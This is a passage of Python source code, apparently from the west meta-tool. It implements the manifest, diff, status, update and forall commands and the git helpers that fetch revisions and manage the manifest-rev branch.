# invalid argument in the args tuple, regardless of
# how many unrecognizable keys there were.
log.die(f'unknown key "{e.args[0]}" in format string '
f'{shlex.quote(args.format)}')
except IndexError:
self.parser.print_usage()
log.die(f'invalid format string {shlex.quote(args.format)}')
except subprocess.CalledProcessError:
log.die(f'subprocess failed while listing {project.name}')
log.inf(result, colorize=False)
class ManifestCommand(_ProjectCommand):
# The slightly weird naming is to avoid a conflict with
# west.manifest.Manifest.
def __init__(self):
super(ManifestCommand, self).__init__(
'manifest',
'manage the west manifest',
textwrap.dedent('''\
Manages the west manifest.
The following actions are available. You must give exactly one.
- --resolve: print the current manifest with all imports applied,
as an equivalent single manifest file. Any imported manifests
must be cloned locally (with "west update").
- --freeze: like --resolve, but with all project revisions
converted to their current SHAs, based on the latest manifest-rev
branches. All projects must be cloned (with "west update").
- --validate: print an error and exit the process unsuccessfully
if the current manifest cannot be successfully parsed.
If the manifest can be parsed, print nothing and exit
successfully.
- --path: print the path to the top level manifest file.
If this file uses imports, it will not contain all the
manifest data.
If the manifest file does not use imports, and all project
revisions are SHAs, the --freeze and --resolve output will
be identical after a "west update".
'''),
accepts_unknown_args=False)
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--resolve', action='store_true',
help='print the manifest with all imports resolved')
group.add_argument('--freeze', action='store_true',
help='''print the resolved manifest with SHAs for
all project revisions''')
group.add_argument('--validate', action='store_true',
help='''validate the current manifest,
exiting with an error if there are issues''')
group.add_argument('--path', action='store_true',
help="print the top level manifest file's path")
group = parser.add_argument_group('options for --resolve and --freeze')
group.add_argument('-o', '--out',
help='output file, default is standard output')
return parser
def do_run(self, args, user_args):
self._setup_logging(args)
# Since the user is explicitly managing the manifest, we are
# deliberately loading it again instead of using self.manifest
# to emit debug logs if enabled, which are turned off when the
# manifest is initially parsed in main.py.
#
# The code in main.py is usually responsible for handling any
# errors and printing useful messages. We re-do error checking
# for manifest-related errors that it won't handle.
try:
manifest = Manifest.from_file(topdir=self.topdir)
except _ManifestImportDepth:
log.die("cannot resolve manifest -- is there a loop?")
except ManifestImportFailed as mif:
log.die(f"manifest import failed\n Project: {mif.project}\n "
f"File: {mif.filename}")
except (MalformedManifest, ManifestVersionError) as e:
log.die('\n '.join(str(arg) for arg in e.args))
dump_kwargs = {'default_flow_style': False,
'sort_keys': False}
if args.validate:
pass # nothing more to do
elif args.resolve:
self._dump(args, manifest.as_yaml(**dump_kwargs))
elif args.freeze:
self._dump(args, manifest.as_frozen_yaml(**dump_kwargs))
elif args.path:
log.inf(manifest.path)
else:
# Can't happen.
raise RuntimeError(f'internal error: unhandled args {args}')
def _dump(self, args, to_dump):
if args.out:
with open(args.out, 'w') as f:
f.write(to_dump)
else:
sys.stdout.write(to_dump)
class Diff(_ProjectCommand):
def __init__(self):
super().__init__(
'diff',
'"git diff" for one or more projects',
'Runs "git diff" on each of the specified projects.')
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder,
epilog=ACTIVE_CLONED_PROJECTS_HELP)
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to active cloned projects''')
parser.add_argument('-a', '--all', action='store_true',
help='include output for inactive projects')
return parser
def do_run(self, args, ignored):
self.die_if_no_git()
self._setup_logging(args)
failed = []
no_diff = 0
# We may need to force git to use colors if the user wants them,
# which it won't do ordinarily since stdout is not a terminal.
color = ['--color=always'] if log.use_color() else []
for project in self._cloned_projects(args, only_active=not args.all):
# Use paths that are relative to the base directory to make it
# easier to see where the changes are
cp = project.git(['diff', f'--src-prefix={project.path}/',
f'--dst-prefix={project.path}/',
'--exit-code'] + color,
capture_stdout=True, capture_stderr=True,
check=False)
if cp.returncode == 0:
no_diff += 1
if cp.returncode == 1 or log.VERBOSE > log.VERBOSE_NONE:
log.banner(f'diff for {project.name_and_path}:')
log.inf(cp.stdout.decode('utf-8'))
elif cp.returncode:
failed.append(project)
if failed:
self._handle_failed(args, failed)
elif log.VERBOSE <= log.VERBOSE_NONE:
log.inf(f"Empty diff in {no_diff} projects.")
class Status(_ProjectCommand):
def __init__(self):
super().__init__(
'status',
'"git status" for one or more projects',
"Runs 'git status' for each of the specified projects.")
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder,
epilog=ACTIVE_CLONED_PROJECTS_HELP)
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to active cloned projects''')
parser.add_argument('-a', '--all', action='store_true',
help='include output for inactive projects')
return parser
def do_run(self, args, user_args):
self.die_if_no_git()
self._setup_logging(args)
failed = []
for project in self._cloned_projects(args, only_active=not args.all):
# 'git status' output for all projects is noisy when there
# are lots of projects.
#
# We avoid this problem in 2 steps:
#
# 1. Check if we need to print any output for the
# project.
#
# 2. If so, run 'git status' on the project. Otherwise,
# skip output for the project entirely.
#
# In verbose mode, we always print output.
try:
if not (log.VERBOSE or self.should_print_for(project)):
continue
log.banner(f'status of {project.name_and_path}:')
project.git('status', extra_args=user_args)
except subprocess.CalledProcessError:
failed.append(project)
self._handle_failed(args, failed)
def should_print_for(self, project):
# do_run() helper; check if the project has any status output
# to print. We manually use Popen in order to try to exit as
# quickly as possible if 'git status' prints anything.
# This technique fails when tested on Python 3.6, which west
# still supports at time of writing. This seems likely to be
# due to https://bugs.python.org/issue35182.
#
# Users of old python versions will have to deal with the
# verbose output.
if sys.version_info < (3, 7):
return True
popen = subprocess.Popen(['git', 'status', '--porcelain'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=project.abspath)
def has_output():
# 'git status --porcelain' prints nothing if there
# are no notable changes, so any output at all
# means we should run 'git status' on the project.
stdout, stderr = None, None
try:
stdout, stderr = popen.communicate(timeout=0.1)
except subprocess.TimeoutExpired:
pass
except ValueError:
# In case this isn't issue35182, handle the exception
# anyway.
log.wrn(
f'{project.name}: internal error; got ValueError '
'from Popen.communicate() when checking status. '
'Ignoring it, but please report this to the west '
'developers.')
return True
return stdout or stderr
while True:
if has_output():
popen.kill()
return True
if popen.poll() is not None:
break
return has_output()
class Update(_ProjectCommand):
def __init__(self):
super().__init__(
'update',
'update projects described in west manifest',
textwrap.dedent('''\
Updates active projects defined in the manifest file as follows:
1. Clone the project if necessary
2. If necessary, fetch the project's revision from its remote
(see "fetching behavior" below)
3. Reset the manifest-rev branch to the current manifest revision
4. Check out the new manifest-rev commit as a detached
HEAD (the default), or keep/rebase existing checked out branches
(see "checked out branch behavior")
You must have already created a west workspace with "west init".
This command does not alter the manifest repository's contents.''')
)
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder)
parser.add_argument('--stats', action='store_true',
help='''print performance statistics for
update operations''')
group = parser.add_argument_group(
title='local project clone caches',
description=textwrap.dedent('''\
Projects are usually initialized by fetching from their URLs, but
they can also be cloned from caches on the local file system.'''))
group.add_argument('--name-cache',
help='''cached repositories are in subdirectories
matching the names of projects to update''')
group.add_argument('--path-cache',
help='''cached repositories are in the same relative
paths as the workspace being updated''')
group = parser.add_argument_group(
title='fetching behavior',
description='By default, west update tries to avoid fetching.')
group.add_argument('-f', '--fetch', dest='fetch_strategy',
choices=['always', 'smart'],
help='''how to fetch projects when updating:
"always" fetches every project before update,
while "smart" (default) skips fetching projects
whose revisions are SHAs or tags available
locally''')
group.add_argument('-o', '--fetch-opt', action='append', default=[],
help='''additional option to pass to 'git fetch'
if fetching is necessary (e.g. 'o=--depth=1');
may be given more than once''')
group.add_argument('-n', '--narrow', action='store_true',
help='''fetch just the project revision if fetching
is necessary; do not pass --tags to git fetch
(may not work for SHA revisions depending on the Git
host)''')
group = parser.add_argument_group(
title='checked out branch behavior',
description=textwrap.dedent('''\
By default, locally checked out branches are left behind
when manifest-rev commits are checked out.'''))
group.add_argument('-k', '--keep-descendants', action='store_true',
help='''if a checked out branch is a descendant
of the new manifest-rev, leave it checked out
instead (takes priority over --rebase)''')
group.add_argument('-r', '--rebase', action='store_true',
help='''rebase any checked out branch onto the new
manifest-rev instead (leaving behind partial
rebases on error)''')
group = parser.add_argument_group(
title='advanced options')
group.add_argument('--group-filter', '--gf', action='append',
default=[], metavar='FILTER', dest='group_filter',
help='''proceed as if FILTER was appended to
manifest.group-filter; may be given multiple
times''')
group = parser.add_argument_group('deprecated options')
group.add_argument('-x', '--exclude-west', action='store_true',
help='ignored for backwards compatibility')
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to all active projects''')
return parser
def do_run(self, args, _):
self.die_if_no_git()
self._setup_logging(args)
self.init_state(args)
# We can't blindly call self._projects() here: manifests with
# imports are limited to plain 'west update', and cannot use
# 'west update PROJECT [...]'.
if not self.args.projects:
self.update_all()
else:
self.update_some()
def init_state(self, args):
# Helper for initializing instance state in response to
# command line args and configuration files.
self.args = args
if args.exclude_west:
log.wrn('ignoring --exclude-west')
self.narrow = args.narrow or config.getboolean('update', 'narrow',
fallback=False)
self.path_cache = args.path_cache or config.get('update', 'path-cache',
fallback=None)
self.name_cache = args.name_cache or config.get('update', 'name-cache',
fallback=None)
self.sync_submodules = config.getboolean('update', 'sync-submodules',
fallback=True)
self.group_filter: List[str] = []
def handle(group_filter_item):
item = group_filter_item.strip()
if not item.startswith(('-', '+')):
log.die(f'invalid --group-filter item {item}: '
'must start with - or +')
if not is_project_group(item[1:]):
log.die(f'invalid --group-filter item {item}: '
f'"{item[1:]}" is not a valid group name')
self.group_filter.append(item)
for item in args.group_filter:
if ',' in item:
for split_item in item.split(','):
handle(split_item)
else:
handle(item)
self.fs = self.fetch_strategy()
def update_all(self):
# Plain 'west update' is the 'easy' case: since the user just
# wants us to update everything, we don't have to keep track
# of projects appearing or disappearing as a result of fetching
# new revisions from projects with imports.
#
# So we just re-parse the manifest, but force west.manifest to
# call our importer whenever it encounters an import statement
# in a project, allowing us to control the recursion so it
# always uses the latest manifest data.
self.updated = set()
self.manifest = Manifest.from_file(
importer=self.update_importer,
import_flags=ImportFlag.FORCE_PROJECTS)
failed = []
for project in self.manifest.projects:
if (isinstance(project, ManifestProject) or
project.name in self.updated):
continue
try:
if not self.project_is_active(project):
log.dbg(f'{project.name}: skipping inactive project')
continue
self.update(project)
self.updated.add(project.name)
except subprocess.CalledProcessError:
failed.append(project)
self._handle_failed(self.args, failed)
def update_importer(self, project, path):
if isinstance(project, ManifestProject):
if not project.is_cloned():
                log.die(f"manifest repository {project.abspath} was deleted")
else:
# There's no need to call self.project_is_active(),
# because the Manifest API guarantees that 'groups' cannot
# be combined with 'import' within a single project.
#
# That's good, because the semantics would be kind of hard
# to specify in this case.
assert not project.groups
self.update(project)
self.updated.add(project.name)
try:
return _manifest_content_at(project, path)
except FileNotFoundError:
# FIXME we need each project to have back-pointers
# to the manifest file where it was defined, so we can
# tell the user better context than just "run -vvv", which
# is a total fire hose.
name = project.name
sha = project.sha(QUAL_MANIFEST_REV)
if log.VERBOSE < log.VERBOSE_EXTREME:
suggest_vvv = ('\n'
' Use "west -vvv update" to debug.')
else:
suggest_vvv = ''
log.die(f"can't import from project {name}\n"
f' Expected to import from {path} at revision {sha}\n'
f' Hint: possible manifest file fixes for {name}:\n'
f' - set "revision:" to a git ref with this file '
f'at URL {project.url}\n'
' - remove the "import:"' + suggest_vvv)
def update_some(self):
# The 'west update PROJECT [...]' style invocation is only
# implemented for projects defined within the manifest
# repository.
#
# It's unclear how to do this properly in the case of
# a project A whose definition is imported from
# another project B, especially when B.revision is not
# a fixed SHA. Do we forcibly need to update B first?
# Should we skip it? Should it be configurable? Etc.
#
# For now, just refuse to do so. We can try to relax
# this restriction if it proves cumbersome.
if not self.has_manifest or self.manifest.has_imports:
projects = self.toplevel_projects()
assert self.has_manifest # toplevel_projects() must ensure this.
else:
projects = self._projects(self.args.projects)
failed = []
for project in projects:
if isinstance(project, ManifestProject):
continue
try:
self.update(project)
except subprocess.CalledProcessError:
failed.append(project)
self._handle_failed(self.args, failed)
def toplevel_projects(self):
# Return a list of projects from self.args.projects, or scream
# and die if any projects are either unknown or not defined in
# the manifest repository.
#
# As a side effect, ensures self.manifest is set.
ids = self.args.projects
assert ids
self.manifest = Manifest.from_file(
import_flags=ImportFlag.IGNORE_PROJECTS)
mr_projects, mr_unknown = projects_unknown(self.manifest, ids)
if not mr_unknown:
return mr_projects
try:
self.manifest = Manifest.from_file()
except ManifestImportFailed:
log.die('one or more projects are unknown or defined via '
'imports; please run plain "west update".')
_, unknown = projects_unknown(self.manifest, ids)
if unknown:
die_unknown(unknown)
else:
# All of the ids are known projects, but some of them
# are not defined in the manifest repository.
mr_unknown_set = set(mr_unknown)
from_projects = [p for p in ids if p in mr_unknown_set]
log.die('refusing to update project: ' +
" ".join(from_projects) + '\n' +
' It or they were resolved via project imports.\n'
' Only plain "west update" can currently update them.')
def fetch_strategy(self):
cfg = config.get('update', 'fetch', fallback=None)
if cfg is not None and cfg not in ('always', 'smart'):
log.wrn(f'ignoring invalid config update.fetch={cfg}; '
'choices: always, smart')
cfg = None
if self.args.fetch_strategy:
return self.args.fetch_strategy
elif cfg:
return cfg
else:
return 'smart'
def update_submodules(self, project):
# Updates given project submodules by using
# 'git submodule update --init --checkout --recursive' command
# from the project.path location.
if not project.submodules:
return
submodules = project.submodules
submodules_update_strategy = ('--rebase' if self.args.rebase
else '--checkout')
# For the list type, update given list of submodules.
if isinstance(submodules, list):
for submodule in submodules:
if self.sync_submodules:
project.git(['submodule', 'sync', '--recursive',
'--', submodule.path])
project.git(['submodule', 'update',
'--init', submodules_update_strategy,
'--recursive', submodule.path])
# For the bool type, update all project submodules
elif isinstance(submodules, bool):
if self.sync_submodules:
project.git(['submodule', 'sync', '--recursive'])
project.git(['submodule', 'update', '--init',
submodules_update_strategy, '--recursive'])
def update(self, project):
if self.args.stats:
stats = dict()
update_start = perf_counter()
else:
stats = None
take_stats = stats is not None
log.banner(f'updating {project.name_and_path}:')
# Make sure we've got a project to work with.
self.ensure_cloned(project, stats, take_stats)
# Point refs/heads/manifest-rev at project.revision,
# fetching it from the remote if necessary.
self.set_new_manifest_rev(project, stats, take_stats)
# Clean up refs/west/*. At some point, we should only do this
# if we've fetched, but we're leaving it here to clean up
# garbage in people's repositories introduced by previous
# versions of west that left refs in place here.
self.clean_refs_west(project, stats, take_stats)
# Make sure HEAD is pointing at *something*.
self.ensure_head_ok(project, stats, take_stats)
# Convert manifest-rev to a SHA.
sha = self.manifest_rev_sha(project, stats, take_stats)
# Based on the new manifest-rev SHA, HEAD, and the --rebase
# and --keep-descendants options, decide what we need to do
# now.
current_branch, is_ancestor, try_rebase = self.decide_update_strategy(
project, sha, stats, take_stats)
# Finish the update. This may be a nop if we're keeping
# descendants.
if self.args.keep_descendants and is_ancestor:
# A descendant is currently checked out and keep_descendants was
# given, so there's nothing more to do.
log.inf(f'west update: left descendant branch '
f'"{current_branch}" checked out; current status:')
if take_stats:
start = perf_counter()
project.git('status')
if take_stats:
                stats['get current status'] = perf_counter() - start
elif try_rebase:
# Attempt a rebase.
log.inf(f'west update: rebasing to {MANIFEST_REV} {sha}')
if take_stats:
start = perf_counter()
project.git('rebase ' + QUAL_MANIFEST_REV)
if take_stats:
stats['rebase onto new manifest-rev'] = perf_counter() - start
else:
# We can't keep a descendant or rebase, so just check
# out the new detached HEAD, then print some helpful context.
if take_stats:
start = perf_counter()
project.git('checkout --detach ' + sha)
if take_stats:
stats['checkout new manifest-rev'] = perf_counter() - start
_post_checkout_help(project, current_branch, sha, is_ancestor)
# Update project submodules, if it has any.
if take_stats:
start = perf_counter()
self.update_submodules(project)
if take_stats:
stats['update submodules'] = perf_counter() - start
# Print performance statistics.
if take_stats:
update_total = perf_counter() - update_start
slop = update_total - sum(stats.values())
stats['other work'] = slop
stats['TOTAL'] = update_total
log.inf('performance statistics:')
for stat, value in stats.items():
log.inf(f' {stat}: {value} sec')
def ensure_cloned(self, project, stats, take_stats):
# update() helper. Make sure project is cloned and initialized.
if take_stats:
start = perf_counter()
cloned = project.is_cloned()
if take_stats:
stats['check if cloned'] = perf_counter() - start
if not cloned:
if take_stats:
start = perf_counter()
self.init_project(project)
if take_stats:
stats['init'] = perf_counter() - start
def init_project(self, project):
# update() helper. Initialize an uncloned project repository.
# If there's a local clone available, it uses that. Otherwise,
# it just creates the local repository and sets up the
# convenience remote without fetching anything from the network.
cache_dir = self.project_cache(project)
if cache_dir is None:
log.small_banner(f'{project.name}: initializing')
init_cmd = ['init', project.abspath]
# Silence the very verbose and repetitive init.defaultBranch
# warning (10 lines per new git clone). The branch
# 'placeholder' will never have any commit so it will never
# actually exist.
if self.git_version_info >= (2, 28, 0):
init_cmd.insert(1, '--initial-branch=init_placeholder')
project.git(init_cmd, cwd=self.topdir)
# This remote is added as a convenience for the user.
# However, west always fetches project data by URL, not name.
# The user is therefore free to change the URL of this remote.
project.git(f'remote add -- {project.remote_name} {project.url}')
else:
log.small_banner(f'{project.name}: cloning from {cache_dir}')
# Clone the project from a local cache repository. Set the
# remote name to the value that would be used without a
# cache.
project.git(['clone', '--origin', project.remote_name,
cache_dir, project.abspath], cwd=self.topdir)
# Reset the remote's URL to the project's fetch URL.
project.git(['remote', 'set-url', project.remote_name,
project.url])
# Make sure we have a detached HEAD so we can delete the
# local branch created by git clone.
project.git('checkout --quiet --detach HEAD')
# Find the name of any local branch created by git clone.
# West commits to only touching 'manifest-rev' in the
# local branch name space.
local_branches = project.git(
['for-each-ref', '--format', '%(refname)', 'refs/heads/*'],
capture_stdout=True).stdout.decode('utf-8').splitlines()
# This should contain at most one branch in current
# versions of git, but we might as well get them all just
# in case that changes.
for branch in local_branches:
if not branch:
continue
# This is safe: it can't be garbage collected by git before we
# have a chance to use it, because we have another ref, namely
# f'refs/remotes/{project.remote_name}/{branch}'.
project.git(['update-ref', '-d', branch])
def project_cache(self, project):
# Find the absolute path to a pre-existing local clone of a project
# and return it. If the search fails, return None.
if self.name_cache is not None:
maybe = Path(self.name_cache) / project.name
if maybe.is_dir():
log.dbg(
f'found {project.name} in --name-cache {self.name_cache}',
level=log.VERBOSE_VERY)
return os.fspath(maybe)
else:
log.dbg(
f'{project.name} not in --name-cache {self.name_cache}',
level=log.VERBOSE_VERY)
elif self.path_cache is not None:
maybe = Path(self.path_cache) / project.path
if maybe.is_dir():
log.dbg(
f'found {project.path} in --path-cache {self.path_cache}',
level=log.VERBOSE_VERY)
return os.fspath(maybe)
else:
log.dbg(
f'{project.path} not in --path-cache {self.path_cache}',
level=log.VERBOSE_VERY)
return None
def set_new_manifest_rev(self, project, stats, take_stats):
# update() helper. Make sure project's manifest-rev is set to
# the latest value it should be.
if self.fs == 'always' or _rev_type(project) not in ('tag', 'commit'):
self.fetch(project, stats, take_stats)
else:
log.dbg('skipping unnecessary fetch')
if take_stats:
start = perf_counter()
_update_manifest_rev(project, f'{project.revision}^{{commit}}')
if take_stats:
stats['set manifest-rev'] = perf_counter() - start
def fetch(self, project, stats, take_stats):
# Fetches rev (or project.revision) from project.url in a way that
# guarantees any branch, tag, or SHA (that's reachable from a
# branch or a tag) available on project.url is part of what got
# fetched.
#
# Returns a git revision which hopefully can be peeled to the
# newly-fetched SHA corresponding to rev. "Hopefully" because
# there are many ways to spell a revision, and they haven't all
# been extensively tested.
if take_stats:
start = perf_counter()
rev = project.revision
# Fetch the revision into the local ref space.
#
# The following two-step approach avoids a "trying to write
# non-commit object" error when the revision is an annotated
# tag. ^{commit} type peeling isn't supported for the <src> in a
# <src>:<dst> refspec, so we have to do it separately.
if _maybe_sha(rev) and not self.narrow:
# We can't in general fetch a SHA from a remote, as some hosts
# forbid it for security reasons. Let's hope it's reachable
# from some branch.
refspec = f'refs/heads/*:{QUAL_REFS}*'
next_manifest_rev = project.revision
else:
# Either the revision is definitely not a SHA and is
# therefore safe to fetch directly, or the user said
# that's OK. This avoids fetching unnecessary refs from
# the remote.
#
# We update manifest-rev to FETCH_HEAD instead of using a
# refspec in case the revision is a tag, which we can't use
# from a refspec.
refspec = project.revision
next_manifest_rev = 'FETCH_HEAD^{commit}'
log.small_banner(f'{project.name}: fetching, need revision {rev}')
# --tags is required to get tags if we're not run as 'west
# update --narrow', since the remote is specified as a URL.
tags = (['--tags'] if not self.narrow else [])
clone_depth = (['--depth', str(project.clone_depth)] if
project.clone_depth else [])
# -f is needed to avoid errors in case multiple remotes are
# present, at least one of which contains refs that can't be
# fast-forwarded to our local ref space.
project.git(['fetch', '-f'] + tags + clone_depth +
self.args.fetch_opt +
['--', project.url, refspec])
if take_stats:
stats['fetch'] = perf_counter() - start
# Update manifest-rev, leaving an entry in the reflog.
if take_stats:
start = perf_counter()
new_ref = project.sha(next_manifest_rev)
_update_manifest_rev(project, new_ref)
if take_stats:
stats['set manifest-rev'] = perf_counter() - start
@staticmethod
def clean_refs_west(project, stats, take_stats):
# update() helper. Make sure refs/west/* is empty after
# setting the new manifest-rev.
#
# Head of manifest-rev is now pointing to current manifest revision.
# Thus it is safe to unconditionally clear out the refs/west space.
#
# Doing this here instead of in Update.fetch() ensures that it
# gets cleaned up when users upgrade from older versions of
# west (like 0.6.x) that didn't handle this properly.
#
# In the future, this can be moved into Update.fetch() after
# the install base of older west versions is expected to be
# smaller.
if take_stats:
start = perf_counter()
_clean_west_refspace(project)
if take_stats:
stats['clean up refs/west/*'] = perf_counter() - start
@staticmethod
def ensure_head_ok(project, stats, take_stats):
# update() helper. Ensure HEAD points at something reasonable.
if take_stats:
start = perf_counter()
head_ok = _head_ok(project)
if take_stats:
stats['check HEAD is ok'] = perf_counter() - start
if not head_ok:
# If nothing is checked out (which usually only happens if
# we called Update.init_project() above), check out
# 'manifest-rev' in a detached HEAD state.
#
# Otherwise, it's possible for the initial state to have
# nothing checked out and HEAD pointing to a non-existent
# branch. This causes the 'git rev-parse --abbrev-ref HEAD'
# which happens later in the update to fail.
#
# The --detach flag is strictly redundant here, because
# the qualified manifest-rev form detaches HEAD, but
# it avoids a spammy detached HEAD warning from Git.
if take_stats:
start = perf_counter()
project.git('checkout --detach ' + QUAL_MANIFEST_REV)
if take_stats:
stats['checkout new manifest-rev'] = perf_counter() - start
@staticmethod
def manifest_rev_sha(project, stats, take_stats):
# update() helper. Get the SHA for manifest-rev.
        try:
            if take_stats:
                start = perf_counter()
            sha = project.sha(QUAL_MANIFEST_REV)
            if take_stats:
                stats['get new manifest-rev SHA'] = perf_counter() - start
            return sha
except subprocess.CalledProcessError:
# This is a sign something's really wrong. Add more help.
log.err(f'no SHA for branch {MANIFEST_REV} '
f'in {project.name_and_path}; was the branch deleted?')
raise
def decide_update_strategy(self, project, sha, stats, take_stats):
# update() helper. Decide on whether we have an ancestor
# branch or whether we should try to rebase.
if take_stats:
start = perf_counter()
cp = project.git('rev-parse --abbrev-ref HEAD', capture_stdout=True)
if take_stats:
stats['get current branch HEAD'] = perf_counter() - start
current_branch = cp.stdout.decode('utf-8').strip()
if current_branch != 'HEAD':
if take_stats:
start = perf_counter()
is_ancestor = project.is_ancestor_of(sha, current_branch)
if take_stats:
stats['check if HEAD is ancestor of manifest-rev'] = \
perf_counter() - start
try_rebase = self.args.rebase
else: # HEAD means no branch is checked out.
# If no branch is checked out, 'rebase' and
# 'keep_descendants' don't matter.
is_ancestor = False
try_rebase = False
return current_branch, is_ancestor, try_rebase
def project_is_active(self, project):
return self.manifest.is_active(project, extra_filter=self.group_filter)
class ForAll(_ProjectCommand):
def __init__(self):
super().__init__(
'forall',
'run a command in one or more local projects',
textwrap.dedent('''\
Runs a shell (on a Unix OS) or batch (on Windows) command
within the repository of each of the specified PROJECTs.
If the command has multiple words, you must quote the -c
option to prevent the shell from splitting it up. Since
the command is run through the shell, you can use
wildcards and the like.
For example, the following command will list the contents
of proj-1's and proj-2's repositories on Linux and macOS,
in long form:
west forall -c "ls -l" proj-1 proj-2
'''))
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder,
epilog=ACTIVE_CLONED_PROJECTS_HELP)
parser.add_argument('-c', dest='subcommand', metavar='COMMAND',
required=True)
parser.add_argument('-a', '--all', action='store_true',
help='include inactive projects'),
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to active cloned projects''')
return parser
def do_run(self, args, user_args):
self._setup_logging(args)
failed = []
for project in self._cloned_projects(args, only_active=not args.all):
log.banner(
f'running "{args.subcommand}" in {project.name_and_path}:')
rc = subprocess.Popen(args.subcommand, shell=True,
cwd=project.abspath).wait()
if rc:
failed.append(project)
self._handle_failed(args, failed)
class Topdir(_ProjectCommand):
def __init__(self):
super().__init__(
'topdir',
'print the top level directory of the workspace',
textwrap.dedent('''\
Prints the absolute path of the current west workspace's
top directory.
This is the directory containing .west. All project
paths in the manifest are relative to this top directory.'''))
def do_add_parser(self, parser_adder):
return self._parser(parser_adder)
def do_run(self, args, user_args):
log.inf(PurePath(self.topdir).as_posix())
class SelfUpdate(_ProjectCommand):
def __init__(self):
super().__init__(
'selfupdate',
'deprecated; exists for backwards compatibility',
'Do not use. You can upgrade west with pip only from v0.6.0.')
def do_add_parser(self, parser_adder):
return self._parser(parser_adder)
def do_run(self, args, user_args):
log.die(self.description)
#
# Private helper routines.
#
def _clean_west_refspace(project):
# Clean the refs/west space to ensure they do not show up in 'git log'.
# Get all the ref names that start with refs/west/.
list_refs_cmd = ('for-each-ref --format="%(refname)" -- ' +
QUAL_REFS + '**')
cp = project.git(list_refs_cmd, capture_stdout=True)
west_references = cp.stdout.decode('utf-8').strip()
# Safely delete each one.
for ref in west_references.splitlines():
delete_ref_cmd = 'update-ref -d ' + ref
project.git(delete_ref_cmd)
def _update_manifest_rev(project, new_manifest_rev):
project.git(['update-ref',
'-m', f'west update: moving to {new_manifest_rev}',
QUAL_MANIFEST_REV, new_manifest_rev])
def _maybe_sha(rev):
# Return true if and only if the given revision might be a SHA.
try:
int(rev, 16)
except ValueError:
return False
return len(rev) <= 40
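# Illustrative outcomes (example revisions): _maybe_sha('deadbeef') and
# _maybe_sha('a' * 40) return True, since both parse as hex and are at most 40
# characters long; _maybe_sha('main') returns False because int('main', 16)
# raises ValueError.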
def _rev_type(project, rev=None):
# Returns a "refined" revision type of rev (default:
# project.revision) as one of the following strings: 'tag', 'tree',
# 'blob', 'commit', 'branch', 'other'.
#
# The approach combines git cat-file -t and git rev-parse because,
# while cat-file can for sure tell us a blob, tree, or tag, it
# doesn't have a way to disambiguate between branch names and
# other types of commit-ishes, like SHAs, things like "HEAD" or
# "HEAD~2", etc.
#
# We need this extra layer of refinement to be able to avoid
# fetching SHAs that are already available locally.
#
# This doesn't belong in manifest.py because it contains "west
# update" specific logic.
if not rev:
rev = project.revision
cp = project.git(['cat-file', '-t', rev], check=False,
capture_stdout=True, capture_stderr=True)
stdout = cp.stdout.decode('utf-8').strip()
if cp.returncode:
return 'other'
elif stdout in ('blob', 'tree', 'tag'):
return stdout
elif stdout != 'commit': # just future-proofing
return 'other'
# to tell branches, lightweight tags, and commits apart, we need rev-parse.
cp = project.git(['rev-parse', '--verify', '--symbolic-full-name', rev],
check=False, capture_stdout=True, capture_stderr=True)
if cp.returncode:
# This can happen if the ref name is ambiguous, e.g.:
#
# $ git update-ref ambiguous-ref HEAD~2
# $ git checkout -B ambiguous-ref
#
# Which creates both .git/ambiguous-ref and
# .git/refs/heads/ambiguous-ref.
return 'other'
stdout = cp.stdout.decode('utf-8').strip()
if stdout.startswith('refs/heads'):
return 'branch'
elif stdout.startswith('refs/tags'):
# Annotated tags are handled above. Lightweight tags are
# handled here.
return 'tag'
elif not stdout:
return 'commit'
else:
return 'other'
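# Illustrative outcomes (assuming a typical repository state): an annotated or
# lightweight tag name yields 'tag', a local branch name yields 'branch', a SHA
# that is present locally yields 'commit' (rev-parse prints no symbolic name
# for it), and an unknown or ambiguous revision yields 'other'.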
def _head_ok(project):
# Returns True if the reference 'HEAD' exists and is not a tag or remote
# ref (e.g. refs/remotes/origin/HEAD).
# Some versions of git will report 1, when doing
# 'git show-ref --verify HEAD' even if HEAD is valid, see #119.
# 'git show-ref --head <reference>' will always return 0 if HEAD or
# <reference> is valid.
# We are only interested in HEAD, thus we must avoid <reference> being
# valid. '/' can never point to valid reference, thus 'show-ref --head /'
# will return:
# - 0 if HEAD is present
# - 1 otherwise
return project.git('show-ref --quiet --head /',
check=False).returncode == 0
def _post_checkout_help(project, branch, sha, is_ancestor):
# Print helpful information to the user about a project that
# might have just left a branch behind.
if branch == 'HEAD':
# If there was no branch checked out, there are no
# additional diagnostics that need emitting.
return
rel = relpath(project.abspath)
if is_ancestor:
# If the branch we just left behind is a descendant of
# the new HEAD (e.g. if this is a topic branch the
# user is working on and the remote hasn't changed),
# print a message that makes it easy to get back,
# no matter where in the workspace os.getcwd() is.
log.wrn(f'left behind {project.name} branch "{branch}"; '
f'to switch back to it (fast forward):\n'
f' git -C {rel} checkout {branch}')
log.dbg('(To do this automatically in the future,',
'use "west update --keep-descendants".)')
else:
# Tell the user how they could rebase by hand, and
# point them at west update --rebase.
log.wrn(f'left behind {project.name} branch "{branch}"; '
f'to rebase onto the new HEAD:\n'
f' git -C {rel} rebase {sha} {branch}')
log.dbg('(To do this automatically in the future,',
'use "west update --rebase".)')
def projects_unknown(manifest, projects):
# Retrieve the projects with get_projects(project,
# only_cloned=False). Return a pair: (projects, unknown)
# containing either a projects list and None or None and a list of
# unknown project IDs.
try:
return (manifest.get_projects(projects, only_cloned=False), None)
except ValueError as ve:
if len(ve.args) != 2:
raise # not directly raised by get_projects()
unknown = ve.args[0]
if not unknown:
raise # only_cloned is False, so this "can't happen"
return (None, unknown)
def die_unknown(unknown):
# Scream and die about unknown projects.
s = 's' if len(unknown) > 1 else ''
names = ' '.join(unknown)
log.die(f'unknown project name{s}/path{s}: {names}\n'
